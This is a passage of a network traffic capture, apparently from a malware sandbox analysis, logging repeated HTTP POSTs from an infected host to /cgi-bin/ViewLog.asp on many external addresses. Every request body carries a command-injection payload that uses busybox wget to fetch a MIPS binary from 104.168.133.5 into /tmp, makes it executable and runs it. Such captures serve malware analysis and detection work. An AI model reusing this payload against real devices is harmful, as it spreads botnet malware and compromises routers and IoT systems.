                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              558192.168.2.134236031.128.218.1638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.273777962 CET171INHTTP/1.1 500 Server Error
                                              Content-Length: 48
                                              Date: Thu, 23 Nov 2023 04:17:49 GMT
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              559192.168.2.134063831.13.70.398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.348836899 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.957257986 CET185INHTTP/1.0 400
                                              Date: Thu, 23 Nov 2023 04:17:50 GMT
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 65 74 68 6f 64 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><body>Method not supported</body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              560192.168.2.133915031.136.119.1358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.366780043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.446233034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.590214014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.622169971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              561192.168.2.135560031.136.92.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.367683887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.446233034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.590214014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.622169018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              562192.168.2.133821485.214.106.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.385674953 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.592117071 CET152INHTTP/1.1 401 Unauthorized
                                              connection: keep-alive
                                              transfer-encoding: chunked
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              563192.168.2.134718431.200.61.1468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.404900074 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              564192.168.2.133582094.120.235.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.407315016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              565192.168.2.135781694.120.13.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.408915043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              566192.168.2.133819031.136.143.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.623322964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.702228069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.846214056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.878168106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              567192.168.2.133811894.72.88.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.651262999 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.864278078 CET194INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html;charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Cache-control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              568192.168.2.134268894.187.117.258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.658427954 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              569192.168.2.136008231.136.11.358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.724276066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.958266020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.102426052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.134198904 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              570192.168.2.133842862.29.27.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.759743929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              571192.168.2.133776095.86.99.2138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.764882088 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
